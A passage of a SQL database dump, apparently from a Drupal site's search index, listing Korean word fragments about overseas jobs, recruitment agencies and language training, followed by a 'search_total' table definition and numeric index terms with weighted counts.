('기관과', 24, 'ko', 'node_search', 0.687638),
('기능인', 23, 'ko', 'node_search', 0.705825),
('기량검', 24, 'ko', 'node_search', 0.786915),
('기쁩니', 1, 'ko', 'node_search', 1),
('기술을', 23, 'ko', 'node_search', 0.766757),
('기술을', 24, 'ko', 'node_search', 0.71),
('기업들', 23, 'ko', 'node_search', 1),
('기업체', 23, 'ko', 'node_search', 0.845322),
('기준에', 24, 'ko', 'node_search', 0.833529),
('기준에', 26, 'ko', 'node_search', 1),
('기초부', 24, 'ko', 'node_search', 0.757065),
('기회를', 23, 'ko', 'node_search', 2.748),
('기회를', 24, 'ko', 'node_search', 1.87634),
('기회를', 25, 'ko', 'node_search', 1),
('기회를', 28, 'ko', 'node_search', 1),
('기회에', 1, 'ko', 'node_search', 1),
('긴급하', 30, 'ko', 'node_search', 28),
('끊임없', 23, 'ko', 'node_search', 0.687638),
('나라를', 23, 'ko', 'node_search', 1),
('냈습니', 23, 'ko', 'node_search', 1),
('너들와', 23, 'ko', 'node_search', 0.876337),
('년들에', 23, 'ko', 'node_search', 0.792123),
('년들에', 26, 'ko', 'node_search', 1),
('노동자', 24, 'ko', 'node_search', 1),
('노동자', 30, 'ko', 'node_search', 28),
('노력하', 23, 'ko', 'node_search', 0.683725),
('노력하', 26, 'ko', 'node_search', 1),
('누들이', 23, 'ko', 'node_search', 0.774192),
('뉴코멧', 11, 'ko', 'node_search', 18),
('뉴코멧', 23, 'ko', 'node_search', 6.67319),
('뉸타운', 11, 'ko', 'node_search', 1),
('는자매', 23, 'ko', 'node_search', 1),
('능인력', 23, 'ko', 'node_search', 0.703756),
('니어링', 24, 'ko', 'node_search', 1),
('다양한', 1, 'ko', 'node_search', 1),
('다양한', 23, 'ko', 'node_search', 1),
('다음과', 30, 'ko', 'node_search', 28),
('달성을', 1, 'ko', 'node_search', 1),
('담당자', 29, 'ko', 'node_search', 28),
('당으로', 24, 'ko', 'node_search', 1),
('당자인', 29, 'ko', 'node_search', 28),
('대행사', 1, 'ko', 'node_search', 1),
('대행사', 25, 'ko', 'node_search', 8),
('도와주', 23, 'ko', 'node_search', 0.836446),
('도움되', 24, 'ko', 'node_search', 0.781775),
('도움을', 1, 'ko', 'node_search', 1),
('도움이', 1, 'ko', 'node_search', 1),
('도쿠테', 24, 'ko', 'node_search', 1),
('동자들', 24, 'ko', 'node_search', 1),
('동자들', 30, 'ko', 'node_search', 28),
('되도록', 23, 'ko', 'node_search', 0.860547),
('되었습', 26, 'ko', 'node_search', 1),
('두바이', 23, 'ko', 'node_search', 0.827757),
('두바이', 24, 'ko', 'node_search', 0.957226),
('드리고', 28, 'ko', 'node_search', 1),
('드리기', 1, 'ko', 'node_search', 1),
('드립니', 1, 'ko', 'node_search', 1),
('득하도', 24, 'ko', 'node_search', 0.705825),
('득하여', 23, 'ko', 'node_search', 1),
('들에게', 23, 'ko', 'node_search', 0.78951),
('들에게', 26, 'ko', 'node_search', 1),
('등록번', 23, 'ko', 'node_search', 1),
('등록해', 28, 'ko', 'node_search', 3),
('등에서', 1, 'ko', 'node_search', 1),
('떵뉸타', 11, 'ko', 'node_search', 1),
('라떵뉸', 11, 'ko', 'node_search', 1),
('락해주', 1, 'ko', 'node_search', 1),
('람들을', 24, 'ko', 'node_search', 1.60682),
('량검증', 24, 'ko', 'node_search', 0.784336),
('러분을', 1, 'ko', 'node_search', 1),
('러분의', 1, 'ko', 'node_search', 1),
('레이너', 23, 'ko', 'node_search', 0.882818),
('레이딩', 11, 'ko', 'node_search', 18),
('레이시', 1, 'ko', 'node_search', 1),
('레이시', 23, 'ko', 'node_search', 0.822065),
('레이시', 24, 'ko', 'node_search', 0.949597),
('려움을', 24, 'ko', 'node_search', 1),
('력으로', 28, 'ko', 'node_search', 28),
('력있는', 23, 'ko', 'node_search', 0.869951),
('력하고', 23, 'ko', 'node_search', 0.681785),
('력하고', 26, 'ko', 'node_search', 1),
('력하여', 23, 'ko', 'node_search', 1),
('련하고', 24, 'ko', 'node_search', 0.827757),
('렴제도', 26, 'ko', 'node_search', 1),
('로부터', 23, 'ko', 'node_search', 0.976851),
('로자를', 26, 'ko', 'node_search', 1),
('로젝트', 30, 'ko', 'node_search', 1),
('록번호', 23, 'ko', 'node_search', 1),
('록해주', 28, 'ko', 'node_search', 3),
('르에서', 30, 'ko', 'node_search', 28),
('르치고', 28, 'ko', 'node_search', 1),
('르칩니', 24, 'ko', 'node_search', 0.76431),
('리합니', 30, 'ko', 'node_search', 1),
('립니다', 1, 'ko', 'node_search', 1),
('립되어', 23, 'ko', 'node_search', 1),
('립되었', 26, 'ko', 'node_search', 1),
('마련하', 24, 'ko', 'node_search', 0.830633),
('마스터', 24, 'ko', 'node_search', 0.752312),
('마에서', 23, 'ko', 'node_search', 0.71),
('말레이', 1, 'ko', 'node_search', 1),
('말레이', 23, 'ko', 'node_search', 0.824901),
('말레이', 24, 'ko', 'node_search', 0.953396),
('망하는', 23, 'ko', 'node_search', 0.945829),
('망하는', 24, 'ko', 'node_search', 1),
('맞이할', 1, 'ko', 'node_search', 1),
('매하는', 23, 'ko', 'node_search', 1),
('멧건설', 23, 'ko', 'node_search', 1),
('멧회사', 23, 'ko', 'node_search', 1),
('면허를', 23, 'ko', 'node_search', 1),
('명했습', 29, 'ko', 'node_search', 3),
('목표는', 25, 'ko', 'node_search', 1),
('목표로', 26, 'ko', 'node_search', 1),
('문대학', 30, 'ko', 'node_search', 1),
('문이나', 1, 'ko', 'node_search', 1),
('문화와', 24, 'ko', 'node_search', 1),
('미얀마', 11, 'ko', 'node_search', 2),
('미얀마', 23, 'ko', 'node_search', 2.43343),
('미얀마', 24, 'ko', 'node_search', 1),
('미얀마', 26, 'ko', 'node_search', 1),
('민가라', 11, 'ko', 'node_search', 1),
('바이버', 11, 'ko', 'node_search', 1),
('발굴하', 25, 'ko', 'node_search', 1),
('발하고', 26, 'ko', 'node_search', 1),
('방문에', 1, 'ko', 'node_search', 1),
('방문에', 24, 'ko', 'node_search', 2),
('방법을', 28, 'ko', 'node_search', 1),
('배우고', 23, 'ko', 'node_search', 0.76431),
('배출하', 23, 'ko', 'node_search', 0.699655),
('보세요', 1, 'ko', 'node_search', 1),
('본어를', 24, 'ko', 'node_search', 0.759465),
('본에서', 23, 'ko', 'node_search', 1),
('본으로', 23, 'ko', 'node_search', 0.752312),
('본으로', 24, 'ko', 'node_search', 2),
('부에서', 23, 'ko', 'node_search', 1),
('부처로', 23, 'ko', 'node_search', 0.98493),
('분들은', 28, 'ko', 'node_search', 3),
('분들을', 24, 'ko', 'node_search', 0.722831),
('분들이', 24, 'ko', 'node_search', 1),
('비되어', 1, 'ko', 'node_search', 1),
('비스들', 24, 'ko', 'node_search', 0.866793),
('비스를', 23, 'ko', 'node_search', 1.47395),
('비스를', 24, 'ko', 'node_search', 1.8631),
('비스와', 1, 'ko', 'node_search', 1),
('비자로', 23, 'ko', 'node_search', 0.740689),
('비자로', 24, 'ko', 'node_search', 1),
('비즈니', 24, 'ko', 'node_search', 0.968904),
('비하면', 25, 'ko', 'node_search', 4),
('빠르게', 28, 'ko', 'node_search', 3),
('쁩니다', 1, 'ko', 'node_search', 1),
('사드립', 1, 'ko', 'node_search', 1),
('사들은', 23, 'ko', 'node_search', 0.989021),
('사람들', 24, 'ko', 'node_search', 1.61033),
('사로서', 25, 'ko', 'node_search', 1),
('사업을', 23, 'ko', 'node_search', 1),
('사업자', 23, 'ko', 'node_search', 1),
('사업체', 24, 'ko', 'node_search', 1),
('사용되', 23, 'ko', 'node_search', 1),
('사용하', 24, 'ko', 'node_search', 1),
('사이에', 26, 'ko', 'node_search', 1),
('사이트', 1, 'ko', 'node_search', 18),
('사이트', 11, 'ko', 'node_search', 1),
('산하도', 26, 'ko', 'node_search', 1),
('산하의', 23, 'ko', 'node_search', 0.906287),
('상용트', 23, 'ko', 'node_search', 1),
('상자원', 23, 'ko', 'node_search', 1),
('상황과', 26, 'ko', 'node_search', 1),
('색하시', 1, 'ko', 'node_search', 1),
('생산하', 26, 'ko', 'node_search', 1),
('서비스', 1, 'ko', 'node_search', 1),
('서비스', 23, 'ko', 'node_search', 3.47395),
('서비스', 24, 'ko', 'node_search', 32.691),
('선발하', 26, 'ko', 'node_search', 1),
('선소로', 23, 'ko', 'node_search', 0.957226),
('선소에', 23, 'ko', 'node_search', 0.896076),
('선소에', 24, 'ko', 'node_search', 2),
('선하고', 24, 'ko', 'node_search', 0.98493),
('선호하', 25, 'ko', 'node_search', 4),
('설립되', 23, 'ko', 'node_search', 1),
('설립되', 26, 'ko', 'node_search', 1),
('설명했', 29, 'ko', 'node_search', 3),
('설하여', 24, 'ko', 'node_search', 0.805455),
('설했습', 28, 'ko', 'node_search', 3),
('성하고', 25, 'ko', 'node_search', 1),
('세금들', 23, 'ko', 'node_search', 1),
('센터에', 24, 'ko', 'node_search', 0.797402),
('센터와', 24, 'ko', 'node_search', 0.716357),
('소개하', 1, 'ko', 'node_search', 1),
('소개회', 23, 'ko', 'node_search', 3.67319),
('소수민', 23, 'ko', 'node_search', 0.931053),
('소에서', 23, 'ko', 'node_search', 0.892724),
('소에서', 24, 'ko', 'node_search', 2),
('속되는', 25, 'ko', 'node_search', 4),
('송단길', 11, 'ko', 'node_search', 1),
('수강하', 24, 'ko', 'node_search', 0.7017),
('수민족', 23, 'ko', 'node_search', 0.927431),
('수비자', 23, 'ko', 'node_search', 0.742984),
('수비자', 24, 'ko', 'node_search', 1),
('수업을', 23, 'ko', 'node_search', 0.857458),
('수업을', 24, 'ko', 'node_search', 0.745294),
('수입허', 23, 'ko', 'node_search', 1),
('슈웨삐', 23, 'ko', 'node_search', 1),
('스들을', 24, 'ko', 'node_search', 0.863659),
('스터하', 24, 'ko', 'node_search', 0.749958),
('습니다', 1, 'ko', 'node_search', 2),
('습니다', 23, 'ko', 'node_search', 8.71938),
('습니다', 24, 'ko', 'node_search', 2.53053),
('습니다', 26, 'ko', 'node_search', 2),
('습니다', 28, 'ko', 'node_search', 4),
('습니다', 29, 'ko', 'node_search', 3),
('습니다', 30, 'ko', 'node_search', 3),
('습득하', 24, 'ko', 'node_search', 0.707906),
('시기에', 29, 'ko', 'node_search', 3),
('시작하', 23, 'ko', 'node_search', 2),
('시키고', 24, 'ko', 'node_search', 2),
('신뢰로', 25, 'ko', 'node_search', 4),
('신청했', 23, 'ko', 'node_search', 1),
('실력있', 23, 'ko', 'node_search', 0.873132),
('실현할', 23, 'ko', 'node_search', 0.76188),
('심있는', 28, 'ko', 'node_search', 3),
('십시오', 1, 'ko', 'node_search', 1),
('싱가포', 23, 'ko', 'node_search', 0.816452),
('싱가포', 24, 'ko', 'node_search', 0.942091),
('싱가포', 30, 'ko', 'node_search', 28),
('싶다면', 24, 'ko', 'node_search', 1),
('쌍둥이', 23, 'ko', 'node_search', 1),
('씬마락', 23, 'ko', 'node_search', 0.902857),
('씬마락', 24, 'ko', 'node_search', 1),
('아드리', 28, 'ko', 'node_search', 1),
('아보세', 1, 'ko', 'node_search', 1),
('아웅네', 23, 'ko', 'node_search', 1),
('않도록', 24, 'ko', 'node_search', 1),
('알아보', 1, 'ko', 'node_search', 1),
('야뉴코', 23, 'ko', 'node_search', 1),
('야슈웨', 23, 'ko', 'node_search', 1),
('얀마에', 23, 'ko', 'node_search', 0.712106),
('얀마의', 23, 'ko', 'node_search', 0.779231),
('얀마의', 26, 'ko', 'node_search', 1),
('양성하', 25, 'ko', 'node_search', 1),
('어교육', 24, 'ko', 'node_search', 0.800068),
('어려움', 24, 'ko', 'node_search', 1),
('어학당', 23, 'ko', 'node_search', 0.722831),
('언어교', 24, 'ko', 'node_search', 0.802752),
('언제든', 1, 'ko', 'node_search', 1),
('업들과', 23, 'ko', 'node_search', 1),
('업비자', 23, 'ko', 'node_search', 0.747619),
('업소개', 23, 'ko', 'node_search', 2.71211),
('업으로', 24, 'ko', 'node_search', 1),
('업자등', 23, 'ko', 'node_search', 1),
('업체로', 23, 'ko', 'node_search', 0.842342),
('업체를', 24, 'ko', 'node_search', 1),
('없도록', 26, 'ko', 'node_search', 1),
('었습니', 26, 'ko', 'node_search', 1),
('에서는', 24, 'ko', 'node_search', 0.792123),
('에이전', 11, 'ko', 'node_search', 18),
('에이전', 25, 'ko', 'node_search', 4),
('엔지니', 24, 'ko', 'node_search', 1),
('여기에', 1, 'ko', 'node_search', 1),
('여러분', 1, 'ko', 'node_search', 2),
('여정에', 1, 'ko', 'node_search', 1),
('역에서', 24, 'ko', 'node_search', 1),
('연결하', 24, 'ko', 'node_search', 0.882818),
('연계하', 24, 'ko', 'node_search', 1.3999),
('연락처', 11, 'ko', 'node_search', 27),
('연락해', 1, 'ko', 'node_search', 1),
('연수비', 23, 'ko', 'node_search', 0.745294),
('연수비', 24, 'ko', 'node_search', 1),
('였습니', 23, 'ko', 'node_search', 2),
('영어를', 30, 'ko', 'node_search', 2),
('영업을', 23, 'ko', 'node_search', 1),
('영합니', 1, 'ko', 'node_search', 16),
('와주고', 23, 'ko', 'node_search', 0.833529),
('외국에', 24, 'ko', 'node_search', 1),
('외국에', 26, 'ko', 'node_search', 1),
('외국의', 28, 'ko', 'node_search', 1),
('외국인', 23, 'ko', 'node_search', 1),
('외직업', 23, 'ko', 'node_search', 2.71211),
('외취업', 26, 'ko', 'node_search', 1),
('요하는', 24, 'ko', 'node_search', 0.902857),
('요하신', 1, 'ko', 'node_search', 1),
('요합니', 30, 'ko', 'node_search', 2),
('용되는', 23, 'ko', 'node_search', 1),
('용접공', 23, 'ko', 'node_search', 0.866793),
('용접공', 24, 'ko', 'node_search', 1),
('용주와', 26, 'ko', 'node_search', 1),
('용청렴', 26, 'ko', 'node_search', 1),
('용트럭', 23, 'ko', 'node_search', 1),
('용하는', 24, 'ko', 'node_search', 1),
('우리는', 28, 'ko', 'node_search', 1),
('우리의', 25, 'ko', 'node_search', 68),
('우수한', 23, 'ko', 'node_search', 0.707906),
('운송에', 23, 'ko', 'node_search', 1),
('움되는', 24, 'ko', 'node_search', 0.779231),
('웅네원', 23, 'ko', 'node_search', 0.997306),
('원부에', 23, 'ko', 'node_search', 1),
('원에게', 23, 'ko', 'node_search', 1.96109),
('원하고', 23, 'ko', 'node_search', 0.716357),
('원하는', 23, 'ko', 'node_search', 0.797402),
('원하는', 24, 'ko', 'node_search', 0.920273),
('웨삐띡', 23, 'ko', 'node_search', 1),
('웹사이', 1, 'ko', 'node_search', 18),
('웹사이', 11, 'ko', 'node_search', 1),
('유능한', 23, 'ko', 'node_search', 0.889397),
('유롭게', 1, 'ko', 'node_search', 1),
('유형의', 23, 'ko', 'node_search', 1),
('육센터', 24, 'ko', 'node_search', 0.718502),
('육시킴', 24, 'ko', 'node_search', 1),
('윤리적', 24, 'ko', 'node_search', 0.842342),
('율적으', 24, 'ko', 'node_search', 0.771698),
('이너들', 23, 'ko', 'node_search', 0.879565),
('이메일', 11, 'ko', 'node_search', 1),
('이상에', 24, 'ko', 'node_search', 1),
('이상의', 23, 'ko', 'node_search', 1.96109),
('이시아', 1, 'ko', 'node_search', 1),
('이시아', 23, 'ko', 'node_search', 0.819249),
('이시아', 24, 'ko', 'node_search', 0.945829),
('이전시', 11, 'ko', 'node_search', 18),
('이전시', 25, 'ko', 'node_search', 4),
('이주기', 26, 'ko', 'node_search', 1),
('이트를', 1, 'ko', 'node_search', 1),
('이트에', 1, 'ko', 'node_search', 16),
('이해가', 30, 'ko', 'node_search', 2),
('익히도', 24, 'ko', 'node_search', 1),
('인고용', 23, 'ko', 'node_search', 1),
('인력을', 23, 'ko', 'node_search', 0.7017),
('인재를', 25, 'ko', 'node_search', 1),
('인종과', 24, 'ko', 'node_search', 1),
('일본어', 24, 'ko', 'node_search', 4.20646),
('일본어', 28, 'ko', 'node_search', 28),
('일본에', 23, 'ko', 'node_search', 1),
('일본에', 24, 'ko', 'node_search', 0.727213),
('일본으', 23, 'ko', 'node_search', 0.754681),
('일본으', 24, 'ko', 'node_search', 2),
('일본의', 23, 'ko', 'node_search', 0.771698),
('일본의', 24, 'ko', 'node_search', 1),
('일하고', 24, 'ko', 'node_search', 1),
('일하고', 26, 'ko', 'node_search', 1),
('일하기', 23, 'ko', 'node_search', 0.802752),
('일하기', 24, 'ko', 'node_search', 0.927431),
('임없이', 23, 'ko', 'node_search', 0.685676),
('입니다', 25, 'ko', 'node_search', 1),
('입허가', 23, 'ko', 'node_search', 1),
('있다면', 30, 'ko', 'node_search', 1),
('있도록', 23, 'ko', 'node_search', 2.26921),
('있습니', 1, 'ko', 'node_search', 2),
('있습니', 23, 'ko', 'node_search', 3.76117),
('있습니', 24, 'ko', 'node_search', 2.53455),
('있습니', 26, 'ko', 'node_search', 1),
('있습니', 28, 'ko', 'node_search', 1),
('있습니', 30, 'ko', 'node_search', 3),
('있어야', 30, 'ko', 'node_search', 4),
('있으며', 23, 'ko', 'node_search', 0.848323),
('자격시', 23, 'ko', 'node_search', 0.738408),
('자동차', 23, 'ko', 'node_search', 1),
('자동차', 24, 'ko', 'node_search', 0.972861),
('자들을', 24, 'ko', 'node_search', 1),
('자들이', 30, 'ko', 'node_search', 28),
('자등록', 23, 'ko', 'node_search', 1),
('자매를', 24, 'ko', 'node_search', 0.997306),
('자세히', 1, 'ko', 'node_search', 1),
('자원부', 23, 'ko', 'node_search', 1),
('자유롭', 1, 'ko', 'node_search', 1),
('작업을', 23, 'ko', 'node_search', 0.968904),
('작하였', 23, 'ko', 'node_search', 2),
('장에서', 24, 'ko', 'node_search', 1.80275),
('저희가', 1, 'ko', 'node_search', 1),
('저희는', 23, 'ko', 'node_search', 0.714225),
('저희에', 1, 'ko', 'node_search', 1),
('적으로', 24, 'ko', 'node_search', 0.769219),
('전문대', 30, 'ko', 'node_search', 1),
('전통문', 24, 'ko', 'node_search', 1),
('전화번', 11, 'ko', 'node_search', 1),
('접공이', 23, 'ko', 'node_search', 0.863659),
('정들과', 24, 'ko', 'node_search', 0.886095),
('정보를', 1, 'ko', 'node_search', 1),
('정에서', 1, 'ko', 'node_search', 1),
('제공을', 26, 'ko', 'node_search', 1),
('제공하', 1, 'ko', 'node_search', 1),
('제공하', 23, 'ko', 'node_search', 3.08046),
('제공하', 24, 'ko', 'node_search', 0.876337),
('제공함', 24, 'ko', 'node_search', 1),
('제공합', 24, 'ko', 'node_search', 2.36529),
('제공했', 23, 'ko', 'node_search', 1.96109),
('제든지', 1, 'ko', 'node_search', 1),
('제들을', 23, 'ko', 'node_search', 0.920273),
('제야뉴', 23, 'ko', 'node_search', 1),
('제야슈', 23, 'ko', 'node_search', 1),
('제이주', 26, 'ko', 'node_search', 1),
('제정한', 24, 'ko', 'node_search', 0.845322),
('제정한', 26, 'ko', 'node_search', 1),
('제채용', 26, 'ko', 'node_search', 1),
('제통상', 23, 'ko', 'node_search', 1),
('조선소', 23, 'ko', 'node_search', 1.85716),
('조선소', 24, 'ko', 'node_search', 2),
('조정자', 30, 'ko', 'node_search', 1),
('종교의', 24, 'ko', 'node_search', 1),
('종사해', 23, 'ko', 'node_search', 1),
('주기구', 26, 'ko', 'node_search', 1),
('주선하', 24, 'ko', 'node_search', 0.989021),
('주세요', 28, 'ko', 'node_search', 3),
('주십시', 1, 'ko', 'node_search', 1),
('준비되', 1, 'ko', 'node_search', 1),
('즈니스', 24, 'ko', 'node_search', 0.96498),
('지니어', 24, 'ko', 'node_search', 1),
('지속되', 25, 'ko', 'node_search', 4),
('지식과', 30, 'ko', 'node_search', 2),
('지에서', 23, 'ko', 'node_search', 0.934703),
('지역에', 24, 'ko', 'node_search', 1),
('지원하', 23, 'ko', 'node_search', 0.718502),
('직업소', 23, 'ko', 'node_search', 2.71211),
('직업으', 24, 'ko', 'node_search', 1),
('직원에', 23, 'ko', 'node_search', 1.96109),
('직장에', 24, 'ko', 'node_search', 2.80275),
('질문이', 1, 'ko', 'node_search', 1),
('찾아드', 28, 'ko', 'node_search', 1),
('채용청', 26, 'ko', 'node_search', 1),
('처로부', 23, 'ko', 'node_search', 0.980874),
('청년들', 23, 'ko', 'node_search', 0.794753),
('청년들', 26, 'ko', 'node_search', 1),
('청렴제', 26, 'ko', 'node_search', 1),
('청했고', 23, 'ko', 'node_search', 1),
('초부터', 24, 'ko', 'node_search', 0.754681),
('최고의', 25, 'ko', 'node_search', 1),
('최대한', 28, 'ko', 'node_search', 1),
('축하기', 25, 'ko', 'node_search', 4),
('출하여', 23, 'ko', 'node_search', 0.697623),
('취득하', 23, 'ko', 'node_search', 1),
('취업비', 23, 'ko', 'node_search', 0.749958),
('취업을', 23, 'ko', 'node_search', 0.953396),
('취업을', 24, 'ko', 'node_search', 1),
('취업할', 23, 'ko', 'node_search', 0.839384),
('취직을', 24, 'ko', 'node_search', 1),
('치누들', 23, 'ko', 'node_search', 0.776703),
('칩니다', 24, 'ko', 'node_search', 0.76188),
('컴퓨터', 24, 'ko', 'node_search', 0.896076),
('컴퓨터', 30, 'ko', 'node_search', 2),
('코멧건', 23, 'ko', 'node_search', 1),
('코멧회', 23, 'ko', 'node_search', 1),
('코스를', 24, 'ko', 'node_search', 1.7017),
('코스를', 28, 'ko', 'node_search', 28),
('코스와', 28, 'ko', 'node_search', 28),
('쿠테이', 24, 'ko', 'node_search', 1),
('타운십', 11, 'ko', 'node_search', 1),
('타지역', 24, 'ko', 'node_search', 0.695602),
('탐색하', 1, 'ko', 'node_search', 1),
('태국어', 24, 'ko', 'node_search', 1),
('터에서', 24, 'ko', 'node_search', 0.794753),
('터하고', 24, 'ko', 'node_search', 0.747619),
('통문화', 24, 'ko', 'node_search', 1),
('통상자', 23, 'ko', 'node_search', 1),
('통신부', 23, 'ko', 'node_search', 0.909743),
('통신부', 24, 'ko', 'node_search', 1),
('통통신', 23, 'ko', 'node_search', 0.913226),
('통통신', 24, 'ko', 'node_search', 1),
('트레이', 11, 'ko', 'node_search', 18),
('트레이', 23, 'ko', 'node_search', 0.886095),
('파견하', 23, 'ko', 'node_search', 0.693594),
('파송단', 11, 'ko', 'node_search', 1),
('판매하', 23, 'ko', 'node_search', 1),
('편리합', 30, 'ko', 'node_search', 1),
('포르에', 30, 'ko', 'node_search', 28),
('표현을', 24, 'ko', 'node_search', 0.776703),
('풍속을', 24, 'ko', 'node_search', 1),
('프로젝', 30, 'ko', 'node_search', 1),
('피해가', 26, 'ko', 'node_search', 1),
('필요가', 30, 'ko', 'node_search', 28),
('필요에', 26, 'ko', 'node_search', 1),
('필요하', 1, 'ko', 'node_search', 1),
('필요하', 24, 'ko', 'node_search', 0.906287),
('필요한', 23, 'ko', 'node_search', 1.49787),
('필요한', 24, 'ko', 'node_search', 5.51275),
('필요합', 30, 'ko', 'node_search', 2),
('하기를', 23, 'ko', 'node_search', 0.800068),
('하기를', 24, 'ko', 'node_search', 0.923838),
('하도록', 24, 'ko', 'node_search', 0.703756),
('하도록', 26, 'ko', 'node_search', 1),
('하려는', 24, 'ko', 'node_search', 0.697623),
('하시고', 1, 'ko', 'node_search', 1),
('하였습', 23, 'ko', 'node_search', 2),
('학당도', 23, 'ko', 'node_search', 0.72066),
('학당으', 24, 'ko', 'node_search', 1),
('학위가', 30, 'ko', 'node_search', 1),
('한국어', 24, 'ko', 'node_search', 1.7767),
('한국어', 28, 'ko', 'node_search', 28),
('함해외', 24, 'ko', 'node_search', 1),
('합격하', 24, 'ko', 'node_search', 1),
('합격할', 23, 'ko', 'node_search', 0.725015),
('합니다', 1, 'ko', 'node_search', 16),
('합니다', 24, 'ko', 'node_search', 2.35963),
('합니다', 30, 'ko', 'node_search', 7),
('해외로', 23, 'ko', 'node_search', 0.695602),
('해외직', 23, 'ko', 'node_search', 2.71211),
('해외취', 26, 'ko', 'node_search', 1),
('해주세', 28, 'ko', 'node_search', 3),
('해주십', 1, 'ko', 'node_search', 1),
('했습니', 23, 'ko', 'node_search', 1.96109),
('했습니', 28, 'ko', 'node_search', 3),
('했습니', 29, 'ko', 'node_search', 3),
('행사는', 1, 'ko', 'node_search', 1),
('행사에', 25, 'ko', 'node_search', 4),
('행사와', 25, 'ko', 'node_search', 4),
('허가를', 23, 'ko', 'node_search', 1),
('협력으', 28, 'ko', 'node_search', 28),
('협력하', 23, 'ko', 'node_search', 1),
('형제들', 23, 'ko', 'node_search', 0.923838),
('호지원', 24, 'ko', 'node_search', 1),
('호하는', 25, 'ko', 'node_search', 4),
('홍씨가', 29, 'ko', 'node_search', 28),
('화번호', 11, 'ko', 'node_search', 1),
('환영합', 1, 'ko', 'node_search', 16),
('활동을', 23, 'ko', 'node_search', 1),
('회사는', 23, 'ko', 'node_search', 2),
('회사는', 26, 'ko', 'node_search', 1),
('회사들', 23, 'ko', 'node_search', 0.993146),
('회사등', 23, 'ko', 'node_search', 1),
('회사로', 25, 'ko', 'node_search', 1),
('회사의', 26, 'ko', 'node_search', 27),
('회사인', 23, 'ko', 'node_search', 2),
('효과적', 28, 'ko', 'node_search', 1),
('효율적', 24, 'ko', 'node_search', 0.774192),
('훈련과', 26, 'ko', 'node_search', 1),
('희망하', 23, 'ko', 'node_search', 0.949597),
('희망하', 24, 'ko', 'node_search', 1),
('희에게', 1, 'ko', 'node_search', 1),
('히도록', 24, 'ko', 'node_search', 1);

-- --------------------------------------------------------

--
-- Table structure for table `search_total`
--

CREATE TABLE `search_total` (
  `word` varchar(50) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique word in the search index.',
  `count` float DEFAULT NULL COMMENT 'The count of the word in the index using Zipf''s law to equalize the probability distribution.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Stores search totals for words.';

--
-- Dumping data for table `search_total`
--

INSERT INTO `search_total` (`word`, `count`) VALUES
('1', 0.00176308),
('10', 0.128426),
('100', 0.110799),
('1042024', 0.00469512),
('1043', 0.124939),
('1082024', 0.176091),
('1100', 0.30103),
('1102', 0.30103),
('11062024', 0.176091),
('1113', 0.09691),
('1114', 0.30103),
('1118', 0.30103),
('1126', 0.30103),
('1135', 0.30103),
('1135am', 0.30103),
('1140', 0.30103),
('1142', 0.30103),
('1145', 0.30103),
('1146', 0.124939),
('1148', 0.09691),
('1150', 0.30103),
('1151', 0.124939),
('1200', 0.30103),
('1202', 0.30103),
('1202024', 0.09691),
('1218', 0.30103),
('1222024', 0.176091),
('1228', 0.30103),
('1229', 0.176091),
('1233', 0.30103),
('1241', 0.30103),
('1242024', 0.176091),
('1245', 0.30103),
('1250', 0.30103),
('12500000', 0.30103),
('1254', 0.30103),
('1256', 0.30103),
('1257', 0.30103),
('1258', 0.30103),
('13', 0.30103),
('130', 0.30103),
('1301', 0.30103),
('1310', 0.30103),
('1312', 0.30103),
('1316', 0.30103),
('1320', 0.30103),
('1327', 0.30103),
('1347', 0.30103),
('1362024', 0.00782534),
('1404', 0.30103),
('1413', 0.30103),
('1414', 0.30103),
('1421', 0.30103),
('1423', 0.30103),
('1425', 0.30103),
('1426', 0.30103),
('1431', 0.30103),
('15', 0.124939),
('150000', 0.30103),
('150200', 0.124939),
('1507', 0.30103),
('1519', 0.30103),
('1523', 0.176091),
('1526', 0.30103),
('1527', 0.176091),
('1532', 0.30103),
('1534', 0.30103),
('1536', 0.176091),
('1538', 0.30103),
('1541', 0.176091),
('1543', 0.30103),
('1544', 0.176091),
('1547', 0.176091),
('1549', 0.30103),
('1551', 0.30103),
('1553', 0.176091),
('1554', 0.30103),
('1555', 0.30103),
('1557', 0.30103),
('1558', 0.30103),
('1582023', 0.30103),
('1601', 0.176091),
('1605', 0.30103),
('1606', 0.30103),
('1609', 0.124939),
('1619', 0.30103),
('1621', 0.30103),
('1624', 0.176091),
('1627', 0.176091),
('1628', 0.30103),
('1629', 0.30103),
('1631', 0.124939),
('1633', 0.30103),
('1634', 0.30103),
('1636', 0.30103),
('1637', 0.176091),
('1638', 0.30103),
('1642', 0.30103),
('1644', 0.30103),
('1645', 0.30103),
('1650', 0.30103),
('1652', 0.30103),
('1654', 0.176091),
('1656', 0.30103),
('1658', 0.30103),
('1659', 0.124939),
('1701', 0.30103),
('1702', 0.30103),
('1705', 0.176091),
('1708', 0.30103),
('1711', 0.30103),
('1712', 0.30103),
('1713', 0.176091),
('1714', 0.30103),
('1716', 0.30103),
('1718', 0.176091),
('1719', 0.30103),
('1720', 0.30103),
('1721', 0.176091),
('1722', 0.30103),
('1723', 0.30103),
('1724', 0.30103),
('1726', 0.176091),
('1729', 0.124939),
('1730', 0.30103),
('1731', 0.176091),
('1733', 0.176091),
('1734', 0.30103),
('1735', 0.30103),
('1737', 0.124939),
('1738', 0.124939),
('1740', 0.30103),
('1741', 0.176091),
('1743', 0.30103),
('1745', 0.30103),
('1746', 0.176091),
('1748', 0.176091),
('1749', 0.176091),
('1750', 0.176091),
('1751', 0.30103),
('1754', 0.176091),
('1757', 0.124939),
('18', 0.013337),
('1800', 0.30103),
('180000', 0.30103),
('1804', 0.30103),
('1805', 0.30103),
('1807', 0.124939),
('1808', 0.124939),
('1809', 0.124939),
('1810', 0.176091),
('1811', 0.176091),
('1812', 0.176091),
('1813', 0.124939),
('1815', 0.30103),
('1817', 0.124939),
('1818', 0.30103),
('1820', 0.30103),
('1825', 0.30103),
('1826', 0.30103),
('1827', 0.30103),
('1830', 0.30103),
('18393300', 0.081253),
('18393300018393344', 0.0329532),
('18393344', 0.0813001),
('18393393', 0.30103),
('18th', 0.0147233),
('191', 0.30103),
('19120012002', 0.30103),
('1914', 0.0413927),
('1920', 0.176091),
('1921', 0.09691),
('1922', 0.0791812),
('1923', 0.30103),
('1924', 0.30103),
('1925', 0.0511525),
('1926', 0.30103),
('1927', 0.124939),
('1952024', 0.00267259),
('1959', 0.30103),
('1962023', 0.176091),
('1987', 0.293189),
('1990', 0.298884),
('1996', 0.176091),
('1must', 0.176091),
